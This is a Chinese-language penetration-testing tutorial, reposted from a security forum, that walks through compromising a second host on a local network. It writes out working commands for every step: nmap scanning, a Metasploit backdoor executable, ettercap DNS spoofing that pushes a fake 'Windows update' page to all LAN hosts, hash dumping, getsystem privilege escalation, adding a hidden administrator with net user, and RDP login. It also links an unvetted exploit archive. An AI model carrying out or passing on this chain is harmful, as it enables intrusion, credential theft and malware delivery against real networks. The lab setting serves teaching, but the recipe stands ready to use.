本机ubuntu IP:192.168.0.3
虚拟机03主机 IP:192.168.0.128
我们先来模拟一下 比如我拿到了我本机192.168.0.3 这台服务器的管理权限后 我是如何继续渗透192.168.0.128这台主机的首先在内网渗透中最常用的就是信息收集以及端口扫描说起端口扫描和主机信息收集 大家不得不想到了nmap
nmap
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。
正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。
Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。
Nmap 在黑客帝国(The Matrix)中,连同SSH1的32位元循环冗余校验漏洞,被崔妮蒂用以入侵发电站的能源管理系统。
另外更多nmap相关信息 请到百度百科查看 太多 全搬过来的话 界面就不是特别美观了https://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq
我们用nmap的Intense scan模块 来扫描 192.168.0.128 这台主机 是在内网中 扫描端口开放信息以及主机信息等一系列信息~ Intense scan 模块可以满足一般的扫描 如果你要扫描内网主机的话 nmap 192.168.0.1/24 即可 192.168.0.1 是我的路由器地址
nmap -T4 -A -v 192.168.0.128
这里我们不得不说一下 nmap确实很强大 下面为输出结果
我们得知主机系统为 Windows2003 用户组 版本信息 端口信息 开放了3389当然 nmap有很多插件 可以扫描主机漏洞问题 那个我没找到= =
咳咳配置Metasploit exe后门
ps:默认端口4444
有的主机可以配合Metasploit溢出渗透xp 那样直接获取到一个cmd执行权限 本台主机我看了下 没有远程溢出问题 补丁都打好了。
主机开放3389 后 而且是在内网 那么我们dns欺骗 内网全部主机的dns 我们写一个html界面 提示你电脑存在xx漏洞 打补丁 后门改名字可以改为 Windows update.exe html界面越逼真越好。
ettercap -T -i wlp2s0 -q -P dns_spoof /// ///
下面为输出结果参数问题:
-T文本模式 -i接要欺骗的适配器 -q安静模式 -P dns_spoof调用这个插件 /// ///代表所有IP和子网掩码
对方主机打开任何网站 都会成为我本机的index.html
Linux的 index.html在/var/www/html/目录
直接gedit /var/www/html/index.html 即可编辑
首先你要先进入root状态
不然只能读 不能写
上面说了 03主机是受害者 这里我假装上当了
打开了后门
这里我们的msf上线了
帮助信息
首先我们先来读取下192.168.0.128这台主机的hash数值
当然 这些数值不好解密 咳咳
有提权exp 可以直接显示hash值 解密后的
getsystem 获取最高权限
shell 进入cmd提权
我们成功获取到了最高权限 进入到了c盘 Windows system32的cmd.exe直接一条命令 即可添加用户管理员权限
net user xaisec xaisec /add net localgroup administrators xaisec /add
连接192.168.0.128 这台主机 rdesktop
没有rdesktop的 可以apt-get install rdesktop 安装
rdesktop -h 参数
rdesktop 192.168.0.128 -u xaisec -p xaisec
-u 是用户名的意思 -p是密码
读取解密哈希值
hash下
administrator admin
xaisec xaisec
使用administrator登录
rdesktop 192.168.0.128 -u administrator -p admin
最后 我整理了下提权exp 有的没有测试 不清楚有没有后门自行检查
链接: https://pan.baidu.com/s/1i56zH0T 密码: qdhm
作者:小爱_Joker
来源:i春秋
链接:https://bbs.ichunqiu.com/thread-20514-1-1.html
炼石信息安全培训春季班开招
QQ:495066536
372806985
敬请持续关注……